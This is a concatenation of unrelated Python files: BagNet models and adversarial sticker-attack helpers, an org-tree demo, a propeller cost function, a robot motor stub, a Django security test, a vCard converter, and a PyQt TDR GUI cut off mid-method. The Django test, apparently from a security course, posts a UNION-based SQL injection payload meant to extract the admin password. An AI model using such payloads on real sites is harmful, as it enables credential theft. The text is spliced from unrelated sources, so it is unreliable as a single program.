    Same as a standard ResNet bottleneck except conv2 uses zero padding, so
    the spatial size can shrink; the shortcut is cropped to match before the
    residual addition.
    """
    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None, kernel_size=1):
        super(BottleneckRF, self).__init__()
        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes)
        # padding deliberately 0 (changed from (kernel_size - 1) // 2)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=kernel_size,
                               stride=stride, padding=0, bias=False)
        self.bn2 = nn.BatchNorm2d(planes)
        self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm2d(planes * 4)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x, **kwargs):
        shortcut = x
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.relu(self.bn2(self.conv2(out)))
        out = self.bn3(self.conv3(out))
        if self.downsample is not None:
            shortcut = self.downsample(x)
        if shortcut.size(-1) != out.size(-1):
            trim = shortcut.size(-1) - out.size(-1)
            shortcut = shortcut[:, :, :-trim, :-trim]
        out += shortcut
        out = self.relu(out)
        return out
class MaskLayer(nn.Module):
    """Multiplies its input by a fixed binary spatial mask.

    The mask is 1 at every (x, y) in the Cartesian product of the two
    coordinate lists and 0 elsewhere, broadcast over batch and channels.
    """

    def __init__(self, shape, coordinate, device):
        super(MaskLayer, self).__init__()
        xs, ys = coordinate
        mask = torch.zeros(shape).to(device)
        for x in xs:
            for y in ys:
                mask[:, :, x, y] = 1
        self.mask = mask

    def forward(self, x):
        return x * self.mask
class BagNetRF(nn.Module):
    """BagNet backbone with a spatial mask applied to the final feature map.

    Identical layout to the debug BagNet, plus a MaskLayer after layer4 that
    zeroes out all patch positions except the selected receptive fields.
    """

    def __init__(self, block, mask, layers, strides=[1, 2, 2, 2], kernel3=[0, 0, 0, 0], num_classes=1000, avg_pool=True):
        # block: bottleneck block class (must expose .expansion)
        # mask: module multiplying layer4's output by a fixed binary mask
        # layers: number of blocks per stage; kernel3[i]: how many leading
        # blocks of stage i use a 3x3 conv2
        self.inplanes = 64
        super(BagNetRF, self).__init__()
        self.conv1 = nn.Conv2d(3, 64, kernel_size=1, stride=1, padding=0,
                               bias=False)
        self.conv2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=0,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64, momentum=0.001)
        self.relu = nn.ReLU(inplace=True)
        self.layer1 = self._make_layer(block, 64, layers[0], stride=strides[0], kernel3=kernel3[0], prefix='layer1')
        self.layer2 = self._make_layer(block, 128, layers[1], stride=strides[1], kernel3=kernel3[1], prefix='layer2')
        self.layer3 = self._make_layer(block, 256, layers[2], stride=strides[2], kernel3=kernel3[2], prefix='layer3')
        self.layer4 = self._make_layer(block, 512, layers[3], stride=strides[3], kernel3=kernel3[3], prefix='layer4')
        self.fc = nn.Linear(512 * block.expansion, num_classes)
        self.avg_pool = avg_pool
        self.block = block
        self.mask = mask

        # He-style initialization for convolutions; BatchNorm starts as identity
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()

    def _make_layer(self, block, planes, blocks, stride=1, kernel3=0, prefix=''):
        # Builds one stage: first block may downsample via a 1x1 conv shortcut;
        # the first `kernel3` blocks use a 3x3 conv2, the rest 1x1.
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        kernel = 1 if kernel3 == 0 else 3
        layers.append(block(self.inplanes, planes, stride, downsample, kernel_size=kernel))
        self.inplanes = planes * block.expansion
        for i in range(1, blocks):
            kernel = 1 if kernel3 <= i else 3
            layers.append(block(self.inplanes, planes, kernel_size=kernel))
        return nn.Sequential(*layers)

    def forward(self, x):
        x = self.conv1(x)
        x = self.conv2(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        print('BagNet: shape after layer4 {}\n'.format(x.shape))
        # Zero out every patch position outside the selected receptive fields
        x = self.mask(x)
        if self.avg_pool:
            # Global average pool, then classify into num_classes logits
            x = nn.AvgPool2d(x.size()[2], stride=1)(x)
            x = x.view(x.size(0), -1)
            x = self.fc(x)
        else:
            # Keep the spatial grid: one logit vector per patch position
            x = x.permute(0,2,3,1)
            x = self.fc(x)
        return x
def bagnet33_RF(batch_size, coordinate, device, pretrained=False, strides=[2, 2, 2, 1], **kwargs):
    """Constructs a Bagnet-33 model (Receptive field mode).

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
    """
    spatial_mask = MaskLayer((batch_size, 2048, 24, 24), coordinate, device)
    net = BagNetRF(BottleneckRF, spatial_mask, [3, 4, 6, 3], strides=strides,
                   kernel3=[1, 1, 1, 1], **kwargs)
    if pretrained:
        net.load_state_dict(model_zoo.load_url(model_urls['bagnet33']))
    return net
###################################################
###################################################
# Helper function from 2019-5-29 notebook
##################################################
def get_topk_acc(y_hat, y):
    """ Compute top-k accuracy
    Input:
        - y_hat: numpy array with shape (batchsize, K). top-k prediction classes
        - y: numpy array with shape(batchsize, ). target classes
    Return: top-k accuracy
    """
    hits = np.fromiter((y[i] in y_hat[i] for i in range(y.size)),
                       dtype=bool, count=y.size)
    return hits.sum() / y.size
def validate(val_loader, model, device, k=5, clip=None, **kwargs):
    """Validate model's top-k accuracy
    Input:
        - val_loader: pytorch data loader.
        - model: pytorch model
        - device: context
        - k (int): top-k accuracy
        - clip (function): If not None, apply clipping on patch logits
    Return:
        val_acc: float
    """
    # switch to evaluate mode
    model.eval()
    total_iter = len(val_loader)
    cum_acc = 0
    val_time = 0
    with torch.no_grad():
        start = time.time()
        for i, (images, target) in enumerate(val_loader):
            images, target = images.to(device), target.to(device)
            tic = time.time()
            if clip:
                # Patch-logit path: clip per-patch logits, then average the
                # spatial grid down to one logit vector per image.
                logits = model(images)
                logits = clip(logits, **kwargs)
                logits = torch.mean(logits, dim=(1, 2))
            else:
                logits = model(images)
            tac = time.time()
            # measure accuracy (same computation as get_topk_acc above)
            _, y_hat = torch.topk(logits, k=k, dim=1)
            y_hat, target = y_hat.cpu().numpy(), target.cpu().numpy()
            acc = sum([target[i] in y_hat[i] for i in range(target.size)]) / target.size
            cum_acc += acc
            val_time += tac-tic
            msg = 'Iteration {}, validation accuracy: {:.3f}, time: {}s'.format(i, acc, tac-tic)
            print(msg)
            logging.info(msg)
        end = time.time()
    # average per-batch accuracy over all batches
    val_acc = cum_acc / total_iter
    msg = 'Validation accuracy: {:.3f}, validation time: {:.2f}, total time: {:.2f}s'.format(val_acc, val_time, end-start)
    print(msg)
    logging.info(msg)
    return val_acc
####################################################
####################################################
# Helper functions from 2019-5-31 notebook
####################################################
def get_low_res_heatmap(bagnet, images, targets, clip=None, **kwargs):
    """Generates low-resolution heatmap for Bagnet-33
    Input:
        - bagnet (pytorch): Bagnet without average pooling
        - images (pytorch tensor): images
        - targets (int list): for which class the heatmap is computed for
    Output: (numpy array) heatmap
    """
    with torch.no_grad():
        patch_logits = bagnet(images).permute([0, 3, 1, 2]).cpu().numpy()
        if clip:
            patch_logits = clip(patch_logits, **kwargs)
        n_images = images.shape[0]
        heatmaps = np.zeros((n_images, 224, 224))
        # Each patch logit is spread over its 33x33 receptive field (stride 8)
        for z in range(n_images):
            target_map = patch_logits[z, targets[z], :, :]
            for p, i in enumerate(range(33, 224, 8)):
                for q, j in enumerate(range(33, 224, 8)):
                    heatmaps[z, i - 33:i, j - 33:j] += target_map[p, q]
    return heatmaps
######################################################
######################################################
# Helper functions from 2019-6-15 notebook
######################################################
def generate_high_res_heatmap(model, patches, target, batchsize=1000, clip=None, **kwargs):
    """Score every pixel-centred patch for *target* and return a 224x224 map.

    patches is processed in chunks of *batchsize*; clip (if given) is applied
    to each chunk's target logits before they are collected.
    """
    with torch.no_grad():
        chunks = []
        for batch in torch.split(patches, batchsize):
            scores = model(batch)[:, target]
            if clip:
                scores = clip(scores, **kwargs)
            chunks.append(scores.data.cpu().numpy().copy())
    return np.hstack(chunks).reshape((224, 224))
def bagnet_patch_predict(bagnet, patches, batch_size=1000, k=1, return_class=True):
    """Average patch logits over all patches and return the top-k prediction.

    Input:
        - bagnet: model mapping a batch of patches to (batch, 1000) logits
        - patches (tensor): stack of patches; first dim is the patch count
        - batch_size (int): patches are scored in chunks of this size
        - k (int): number of top classes/probabilities to return
        - return_class (bool): return class indices if True, else probabilities
    Return: numpy array of shape (k,)
    """
    with torch.no_grad():
        # Accumulate on the input's device instead of unconditionally on CUDA,
        # so CPU tensors work too (CUDA inputs behave as before).
        # ImageNet has 1000 classes.
        cum_logits = torch.zeros(1000, device=patches.device)
        N = patches.shape[0]
        for batch_patches in torch.split(patches, batch_size):
            cum_logits += torch.sum(bagnet(batch_patches), dim=0)
        p = F.softmax(cum_logits / N, dim=0)
        # BUG FIX: p is 1-D, so topk must use dim=0 (dim=1 raised
        # "Dimension out of range").
        values, indices = torch.topk(p, k, dim=0)
        if return_class:
            return indices.cpu().numpy()
        else:
            return values.cpu().numpy()
#####################################################
#####################################################
# Helper functions from 2019-6-21 notebook
#####################################################
def pad_tensor_image(image, patchsize):
    """Zero-pad a (1, C, H, W) image by (patchsize-1)//2 on every side.

    Returns a float tensor of shape (1, C, H + patchsize - 1, W + patchsize - 1)
    with the original image centred in the padded canvas.
    """
    _, channels, height, width = image.shape
    margin = (patchsize - 1) // 2
    canvas = torch.zeros((channels, height + patchsize - 1, width + patchsize - 1))
    canvas[:, margin:margin + height, margin:margin + width] = image[0]
    return canvas[None].float()
#####################################################
#####################################################
# Helper function from 2019-6-22 notebook
#####################################################
def undo_imagenet_preprocess(image):
    """ Undo imagenet preprocessing
    Input:
        - image (pytorch tensor): image after imagenet preprocessing in CPU, shape = (3, 224, 224)
    Output:
        - undo_image (pytorch tensor): pixel values in [0, 1]
    """
    mean = torch.Tensor([0.485, 0.456, 0.406]).view((3, 1, 1))
    std = torch.Tensor([0.229, 0.224, 0.225]).view((3, 1, 1))
    return image * std + mean
#####################################################
######################################################
# Helper functions for CleverHans SPSA sticker attack
######################################################
class CleverhansDataLoader:
    """Iterator yielding one (image, label) pair at a time from a batch.

    Input:
        - images (numpy array): shape (batch_size, 3, 224, 224)
        - labels (numpy array): shape (batch_size, )
    Each image is yielded as a copy with a leading batch axis of 1.
    """

    def __init__(self, images, labels):
        self.images = images
        self.labels = labels
        self.length = images.shape[0]
        self.count = -1

    def __iter__(self):
        return self

    def __next__(self):
        self.count += 1
        if self.count >= self.length:
            raise StopIteration
        return (self.images[self.count][None].copy(),
                np.array(self.labels[self.count]))

    def __len__(self):
        return self.images.shape[0]
def load_image(img_path, mean=np.array([0.485, 0.456, 0.406]).reshape((3, 1, 1)), std=np.array([0.229, 0.224, 0.225]).reshape((3, 1, 1))):
    """Load an image and apply ImageNet preprocessing.

    Returns a (3, 224, 224) channels-first array scaled to [0, 1] and
    normalized by *mean* and *std*.
    """
    raw = KImage.load_img(img_path, target_size=(224, 224))
    arr = KImage.img_to_array(raw).transpose([2, 0, 1]) / 255
    return (arr - mean) / std
|
"""
树结构
- 总经理办公室
|- 财务部门
|- 业务部门
|- 销售一组
|- 销售二组
|- 生产部门
|- 研发组
|- 测试组
"""
class Node:
    """A node in an organisation tree: a named department with a duty and
    an ordered list of sub-departments."""

    def __init__(self, name, duty):
        self.name = name
        self.duty = duty
        self.children = []

    def add(self, obj):
        """Attach a child department."""
        self.children.append(obj)

    def remove(self, obj):
        """Detach a child department."""
        self.children.remove(obj)

    def display(self, number=1):
        """Recursively print this subtree, one tab of indent per level."""
        print("{}部门:{} 层级:{} 职责:{}".format((number-1)*"\t",self.name, number, self.duty))
        for child in self.children:
            child.display(number + 1)
if __name__ == '__main__':
    # Top level: the root of the organisation tree
    root = Node("总经理办公室", "总负责人")
    # Second level: departments directly under the root
    money = Node("财务部门", "公司财务管理")
    operation = Node("业务部门", "销售产品")
    production = Node("生产部门", "生产产品")
    root.add(money)
    root.add(operation)
    root.add(production)
    # Third level: sales teams under the operations department
    sell_first = Node("销售一组", "A产品销售")
    sell_second = Node("销售二组", "B产品销售")
    operation.add(sell_first)
    operation.add(sell_second)
    # Third level: R&D and QA teams under the production department
    creat = Node("研发组", "研发组组长")
    test = Node("测试组", "测试组组长")
    production.add(creat)
    production.add(test)
    # Print the whole tree starting from the root
    root.display()
|
from math import exp
from curves import getPropellerArray
from simulation import runSimulation
from writeInput import writeInput
L = 0.257 # propeller's length
def computeI(r, c):
    """Approximate the blade inertia integral with the trapezoidal rule.

    r and c are the radius and chord arrays given to the simulation;
    you can give them by hand or use the return values of 'getPropellerArray'.
    """
    n = len(r)
    integrand = lambda radius, chord: chord * radius ** 2
    # trapezoidal rule: endpoints counted once, interior samples twice
    interior = 0
    for i in range(1, n - 1):
        interior += 2 * integrand(r[i], c[i])
    return L * (integrand(r[0], c[0]) + integrand(r[n - 1], c[n - 1]) + interior) / (2 * n)
def calculateCost(omega, vel, r, c):
    """Combine inertia and terminal-velocity penalties into a blade cost.

    omega is the terminal angular velocity returned by 'runSimulation';
    vel is the linear terminal velocity; r and c are the radius and chord
    arrays given to the simulation.  Returns (cost, omega, vel).
    """
    vel_penalty = 10 * exp(-40 / (vel - 12) ** 2)
    blade_cost = 10 * (computeI(r, c) * omega + vel_penalty)
    return blade_cost, omega, vel
def cost(x):
    """Evaluate one propeller design.

    input: bezier control points in an array
    output: propeller's cost tuple (cost, omega, vel)
    """
    y1, y2, y3, y4, t1, t2, t3 = x
    radius, chord, twist = getPropellerArray(y1, y2, y3, y4, t1, t2, t3, L)
    writeInput(radius, chord, twist)
    omega, vel = runSimulation()
    return calculateCost(omega, vel, radius, chord)
|
from time import clock, sleep
import sys
import signal
import math
import logging
from ev3dev.auto import Motor, LargeMotor, GyroSensor, PowerSupply
from device import read_device, set_duty
g_log = logging.getLogger(__name__)
########################################################################
##
## Runner_stub:Runnerのスタブ
## ライントレーサー開発等で倒立振子ライブラリを使いたくない場合はrunner_stub()を使用すること
##
########################################################################
def runner_stub(sh_mem):
    """Stub of Runner: drives the wheel motors directly from shared memory
    without the inverted-pendulum (self-balancing) library.

    Use runner_stub() when e.g. developing a line tracer and the balancing
    logic is not wanted.  Communicates with the parent process through the
    sh_mem shared-memory object (touch sensor, speed, steering, encoders).
    Runs forever until SIGTERM or an exception triggers shutdown.
    """
    print('Im Runner Stub')

    def shutdown_child(signum=None, frame=None):
        # Close the raw sysfs file handles and stop all motors before exiting.
        # NOTE(review): relies on the variables below already being bound; a
        # SIGTERM arriving before setup completes would raise NameError here.
        motor_encoder_left_devfd.close()
        motor_encoder_right_devfd.close()
        motor_duty_cycle_left_devfd.close()
        motor_duty_cycle_right_devfd.close()
        tail_motor.stop_action = tail_motor.STOP_ACTION_COAST
        tail_motor.stop()
        left_motor.stop()
        right_motor.stop()
        sys.exit()

    signal.signal(signal.SIGTERM, shutdown_child)

    try:
        # Motor setup
        left_motor = LargeMotor('outC')
        right_motor = LargeMotor('outB')
        left_motor.reset()
        right_motor.reset()
        left_motor.run_direct()
        right_motor.run_direct()
        # Tail motor
        tail_motor = Motor('outA')
        # Hold the tail motor in place
        tail_motor.stop_action = tail_motor.STOP_ACTION_HOLD
        tail_motor.stop()

        ########################################################################
        ## Definitions and Initialization variables
        ########################################################################

        # Timing settings for the program
        # Time of each loop, measured in miliseconds.
        loop_time_millisec = 100
        # Time of each loop, measured in seconds.
        loop_time_sec = loop_time_millisec / 1000.0

        motor_angle_raw_left = 0
        motor_angle_raw_right = 0
        motor_angular_speed_reference = 0.0
        a_r = 0.985 #0.98 # Low-pass filter coefficient (for the target average wheel rotation angle). Used when computing the target average rotation angle (rad) of the left/right motors; smaller values make the forward/backward response quicker.
        k_theta_dot = 3.5 # Coefficient for the motor's target angular velocity

        # filehandles for fast reads/writes
        # =================================
        # Open motor files for (fast) reading
        motor_encoder_left_devfd = open(left_motor._path + "/position", "rb")
        motor_encoder_right_devfd = open(right_motor._path + "/position", "rb")
        # Open motor files for (fast) writing
        motor_duty_cycle_left_devfd = open(left_motor._path + "/duty_cycle_sp", "w")
        motor_duty_cycle_right_devfd = open(right_motor._path + "/duty_cycle_sp", "w")

        speed_reference = sh_mem.read_speed_mem()
        steering = sh_mem.read_steering_mem()

        ########################################################################
        ## Wait for the touch sensor to be pressed
        ########################################################################
        print('Runner Waiting ...')

        while not sh_mem.read_touch_sensor_mem():
            sleep(0.025)

        print("-----------------------------------")
        print("GO!")
        print("-----------------------------------")

        # Time at which the (stubbed) balancer loop started
        t_balancer_start = clock()

        while True:
            ###############################################################
            ## Loop info
            ###############################################################
            t_loop_start = clock()

            ###############################################################
            ## Reading the Motor Position
            ###############################################################
            motor_angle_raw_left = read_device(motor_encoder_left_devfd)
            motor_angle_raw_right = read_device(motor_encoder_right_devfd)
            sh_mem.write_motor_encoder_left_mem(motor_angle_raw_left)
            sh_mem.write_motor_encoder_right_mem(motor_angle_raw_right)

            # Low-pass filter the requested speed into a smoothed target
            speed_reference = sh_mem.read_speed_mem()
            motor_angular_speed_reference = ((1.0 - a_r) * ((speed_reference / 100.0) * k_theta_dot)) + (a_r * motor_angular_speed_reference)

            ###############################################################
            ## Computing the motor duty cycle value
            ###############################################################
            motor_duty_cycle = motor_angular_speed_reference

            ###############################################################
            ## Apply the signal to the motor, and add steering
            ###############################################################
            steering = sh_mem.read_steering_mem()
            set_duty(motor_duty_cycle_right_devfd, speed_reference + steering)
            duty = set_duty(motor_duty_cycle_left_devfd, speed_reference - steering)

            ###############################################################
            ## Busy wait for the loop to complete
            ###############################################################
            # clock() does not include time spent sleeping, so the time taken
            # to evaluate this condition effectively substitutes for the sleep
            # (the computation time varies from iteration to iteration).
            sleep(max(loop_time_sec - (clock() - t_loop_start), 0.002))

    except Exception as ex:
        print("It's a Runner Exception")
        g_log.exception(ex)
        shutdown_child()
|
#KZ: SQL Injection - we use the open areas to try and get an admin password
from django.test import TestCase, Client
from django.urls import reverse
from django.http import HttpRequest
from LegacySite.models import *
from LegacySite.views import *
import json
import io
class SQLTest(TestCase):
    """Attempts a SQL injection (UNION select) through the card-use endpoint
    to try to recover the admin password from the open areas of the site."""

    def setUp(self):
        self.client = Client()

    def sql_test(self):
        try:
            # Implement the union vulnerability, while also creating a
            # generic username/password to act through.
            response = ""
            password = 'Pepper1234'
            SaltyCustomer = User.objects.create(username='SaltyCustomer', password='Pepper1234')
            # BUG FIX: this line was `data = io.StringIO {...}` — a bare dict
            # literal after the callable, which is a SyntaxError.  Serialize
            # the payload to JSON and wrap it in a StringIO instead.
            payload = {
                "merchant_id": "NYU Apparel Card",
                "customer_id": "SaltyCustomer",
                "total_value": "1999",
                "records": [{
                    "record_type": "amount_change",
                    "amount_added": 2000,
                    "signature": "' UNION select password from LegacySite_user where username = 'admin' || '",
                }],
            }
            data = io.StringIO(json.dumps(payload))
            filename = "tests/Attack3-Injection_Attack.gftcrd"
            response = self.client.post('/use.html', {'card_data': data, 'filename': filename, 'card_supplied': True, 'card_fname': 'test'},)
            # Force the except branch so the leak check below always runs.
            raise Exception('dummy exception')
        except Exception as ex:
            # Fail only if the admin password actually leaked into the page.
            if response != "" and password in response.content.decode('utf-8'):
                self.assertNotContains(response, password)
            else:
                assert 1 == 1
|
#!/usr/bin/env python
"""Parse vcard stream from stdin, output a CSV for consumption by Office365
"""
import sys
import csv
from collections import namedtuple, OrderedDict
# Parsed Contact tuples, appended by vcard_end() as the stream is read.
vcard_collection = []
# Column order of the Office365 contact-import CSV; also the Contact fields.
FIELDS_CSV = 'ExternalEmailAddress Name FirstName LastName StreetAddress City StateorProvince PostalCode Phone MobilePhone Pager HomePhone Company Title OtherTelephone Department CountryOrRegion Fax Initials Notes Office Manager'.split()
def new_vcard(suffix):
    """BEGIN:VCARD — start a fresh, empty contact record."""
    global the_vcard
    the_vcard = dict.fromkeys(FIELDS_CSV, '')
    the_vcard['Manager'] = 'parse_vcard.py'
def vcard_version(suffix):
    """VERSION: — stash the version string (removed again at END:VCARD)."""
    global the_vcard
    the_vcard['version'] = suffix
def vcard_name(suffix):
    """N: — split 'last;first;rest' into last and first name fields."""
    global the_vcard
    parts = suffix.split(';', 2)
    if len(parts) == 3:
        last, first = parts[0], parts[1]
    else:
        # fewer than three components: treat the whole suffix as the last name
        last, first = suffix, ''
    the_vcard['LastName'] = last
    the_vcard['FirstName'] = first
def vcard_fullname(suffix):
    """FN: — the full display name."""
    global the_vcard
    the_vcard['Name'] = suffix
def vcard_phone(suffix):
    """TEL; — route the number to a CSV column based on its TYPE= value."""
    global the_vcard
    kind, number = suffix.split(':', 1)
    _, kind = kind.split('=')
    column = {'home': 'HomePhone',
              'CELL': 'MobilePhone',
              'work': 'Phone'}.get(kind, 'OtherTelephone')
    the_vcard[column] = number
def vcard_company(suffix):
    """ORG: — the organisation/company name."""
    global the_vcard
    the_vcard['Company'] = suffix
def vcard_title(suffix):
    """TITLE: — the job title."""
    global the_vcard
    the_vcard['Title'] = suffix
def vcard_email(suffix):
    """EMAIL; — keep the address; its TYPE component is ignored."""
    global the_vcard
    _, address = suffix.split(':', 1)
    the_vcard['ExternalEmailAddress'] = address
def vcard_addr(suffix):
    """ADR; — split the ;-separated postal address into CSV columns."""
    global the_vcard
    kind, value = suffix.split(':', 1)
    _, kind = kind.split('=', 1)
    try:
        _, _, full, street, city, state, zipcode, country = value.split(';')
    except ValueError:
        # malformed address: blank out every component
        full = street = city = state = zipcode = country = ''
    the_vcard['PostalCode'] = zipcode
    the_vcard['StateorProvince'] = state
    the_vcard['City'] = city
    the_vcard['StreetAddress'] = street
    the_vcard['CountryOrRegion'] = country
def vcard_note(suffix):
    """NOTE: — free-form notes."""
    global the_vcard
    the_vcard['Notes'] = suffix
def vcard_department(suffix):
    """X-DEPARTMENT: — the department name."""
    global the_vcard
    the_vcard['Department'] = suffix
def vcard_end(suffix):
    """END:VCARD — finalize the record and append it to the collection."""
    global the_vcard
    global vcard_collection
    # 'version' is not a Contact field; drop it before building the tuple
    the_vcard.pop('version')
    vcard_collection.append(Contact(**the_vcard))
def parse_vcard(line):
    """Dispatch one vcard line to its prefix handler.

    Returns -1 (after printing a diagnostic) when no prefix matches.
    The prefixes are mutually exclusive, so the first match is the match.
    """
    for prefix, handler in prefixes.items():
        if line.startswith(prefix):
            handler(line[len(prefix.strip()):].strip())
            return
    print("cannot parse>", line)
    return -1
# Maps each recognised vcard line prefix to its handler; parse_vcard
# dispatches on these (prefixes are mutually exclusive).
prefixes = {
    'BEGIN:VCARD': new_vcard,
    'VERSION:': vcard_version,
    'N:': vcard_name,
    'FN:': vcard_fullname,
    'TEL;': vcard_phone,
    'ORG:': vcard_company,
    'TITLE:': vcard_title,
    'EMAIL;': vcard_email,
    'ADR;': vcard_addr,
    'NOTE:': vcard_note,
    'X-DEPARTMENT:': vcard_department,
    'END:VCARD': vcard_end,
}
# Immutable contact record: one field per CSV column.
Contact = namedtuple('Contact', FIELDS_CSV)
# Parse the whole vcard stream from stdin, filling vcard_collection.
for line in sys.stdin.readlines():
    parse_vcard(line)
# Write all collected contacts to the CSV file named by the first CLI argument.
with open(sys.argv[1], 'w') as f:
    c = csv.writer(f)
    c.writerow(FIELDS_CSV)
    c.writerows([[getattr(r, v) for v in FIELDS_CSV] for r in vcard_collection])
|
# tdr.py
# ================================================================================
# BOOST SOFTWARE LICENSE
#
# Copyright 2020 BitWise Laboratories Inc.
# Original Author.......Jim Waschura
# Contact...............info@bitwiselabs.com
#
# Permission is hereby granted, free of charge, to any person or organization
# obtaining a copy of the software and accompanying documentation covered by
# this license (the "Software") to use, reproduce, display, distribute,
# execute, and transmit the Software, and to prepare derivative works of the
# Software, and to permit third-parties to whom the Software is furnished to
# do so, all subject to the following:
#
# The copyright notices in the Software and this entire statement, including
# the above license grant, this restriction and the following disclaimer,
# must be included in all copies of the Software, in whole or in part, and
# all derivative works of the Software, unless such copies or derivative
# works are solely in the form of machine-executable object code generated by
# a source language processor.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE, TITLE AND NON-INFRINGEMENT. IN NO EVENT
# SHALL THE COPYRIGHT HOLDERS OR ANYONE DISTRIBUTING THE SOFTWARE BE LIABLE
# FOR ANY DAMAGES OR OTHER LIABILITY, WHETHER IN CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# ================================================================================
import datetime
import math
import os
import numpy
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QVBoxLayout, QApplication, QMainWindow
from matplotlib import pyplot as plt
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
from popup import Popup
from connect import Connect
from settings import Settings
class Tdr(Settings):
    def __init__(self, mainWindow: QMainWindow):
        """Wire up the TDR tab: button/spinbox handlers, result state, and the
        matplotlib chart plus an off-screen shadow figure used for saving."""
        super().__init__(mainWindow)
        # print("Tdr::__init__()")

        # Establish event handlers
        self.buttonTDRRefresh.clicked.connect(self.buttonTDRRefresh_clicked)
        self.buttonTDRClear.clicked.connect(self.buttonTDRClear_clicked)
        self.buttonTDRRunSingle.clicked.connect(self.buttonTDRRunSingle_clicked)
        self.buttonTDRResetView.clicked.connect(self.buttonTDRResetView_clicked)
        self.buttonTDRSaveResults.clicked.connect(self.buttonTDRSaveResults_clicked)
        self.numTDRCursorX1.editingFinished.connect(self.numTDRCursorX1_editingFinished)
        self.numTDRCursorX2.editingFinished.connect(self.numTDRCursorX2_editingFinished)

        # Initialize results variables
        self.TDRLogFileContents = None  # pivot-log text, written when saving results
        self.TDRResultsDateTime = None  # timestamp embedded in saved file names

        # On-screen chart with an (initially hidden) navigation toolbar
        self.TDRchartFigure = plt.figure()
        self.TDRchartFigure.set_tight_layout(True)
        self.TDRchartCanvas = FigureCanvas(self.TDRchartFigure)
        self.chartToolbar = NavigationToolbar(self.TDRchartCanvas, mainWindow)
        vLayout = QVBoxLayout()
        vLayout.addWidget(self.TDRchartCanvas)
        vLayout.addWidget(self.chartToolbar)
        self.chartToolbar.hide()
        self.TDRChartLayout.addLayout(vLayout)
        self.TDRcurrentPlot = None
        self.TDRcurrentShadowPlot = None
        self.TDRchartLeft = None   # set later from Tdr.Chart.getLeftPS()
        self.TDRchartWidth = None  # set later from Tdr.Chart.getWidthPS()
        # Off-screen figure mirroring the chart; its canvas renders the PNG on save
        self.TDRshadowFigure = plt.figure()
        self.TDRshadowFigure.set_tight_layout(True)
        self.TDRshadowCanvas = FigureCanvas(self.TDRshadowFigure)
def buttonTDRRefresh_clicked(self):
# print("Tdr::buttonTDRRefresh_clicked")
try:
self.refreshResults(0x1)
except Exception as e:
Popup.error(e)
def buttonTDRClear_clicked(self):
# print("Tdr::buttonTDRClear_clicked")
try:
Connect.getDevice().App.Stop()
Connect.getDevice().App.setTab("TDR")
Connect.getDevice().Clear()
self.refreshResults(0x1)
except Exception as e:
Popup.error(e)
def buttonTDRResetView_clicked(self):
# print("Tdr::buttonTDRResetView_clicked")
try:
Connect.getDevice().App.Stop()
Connect.getDevice().App.setTab("TDR")
Connect.getDevice().Tdr.Reset()
Connect.getDevice().WaitForRunToStart()
Connect.getDevice().WaitForRunToComplete(120.0)
self.refreshResults(0x1)
except Exception as e:
Popup.error(e)
def buttonTDRSaveResults_clicked(self):
# print("Tdr::buttonTDRSaveResults_clicked")
try:
# ensure directories exist
self.ensureDirectoriesExist()
# if results subdirectory doesn't exist, create it
results_subdir = os.path.normpath(
self.editDataDirectory.text().strip() + "/" + self.editResultsName.text().strip())
# print("results_subdir is: " + results_subdir)
if not os.path.exists(results_subdir):
os.mkdir(results_subdir)
name_nospace = self.editResultsName.text().strip().replace(" ", "_")
if self.TDRResultsDateTime is None:
self.TDRResultsDateTime = datetime.datetime.now()
dt_string = self.TDRResultsDateTime.strftime("_%Y-%m-%d_%Hh%Mm%Ss")
chart_file_name = os.path.normpath(results_subdir + "/" + name_nospace + "_Tdr_Chart" + dt_string + ".png")
csv_file_name = os.path.normpath(results_subdir + "/" + name_nospace + "_Tdr_Csv" + dt_string + ".csv")
pivot_file_name = os.path.normpath(results_subdir + "/" + name_nospace + "_Tdr_Pivot"+ dt_string + ".csv")
# print("chart_file_name is: " + chart_file_name)
# print("csv_file_name is: " + csv_file_name)
# retrieve CSV file and store in results subdirectory
if self.checkSaveCSV.isChecked():
Connect.getDevice().App.Stop()
Connect.getDevice().App.setTab("TDR")
try:
csv_remote_file = Connect.getDevice().Tdr.Csv()
# print("csv remote file is: ", csv_remote_file)
csv_file_contents = Connect.getDevice().File.Fetch(csv_remote_file).decode(encoding='utf-8')
f = open(csv_file_name, "w")
f.write(csv_file_contents)
f.close()
except Exception as e:
print("Problem saving CSV file: ", e)
raise e
# save Pivot log file in results subdirectory
if self.TDRLogFileContents is not None:
try:
f = open(pivot_file_name, "w")
f.write(self.TDRLogFileContents)
f.close()
except Exception as e:
print("Problem saving pivot file: ", e)
raise e
# save current chart in results subdirectory
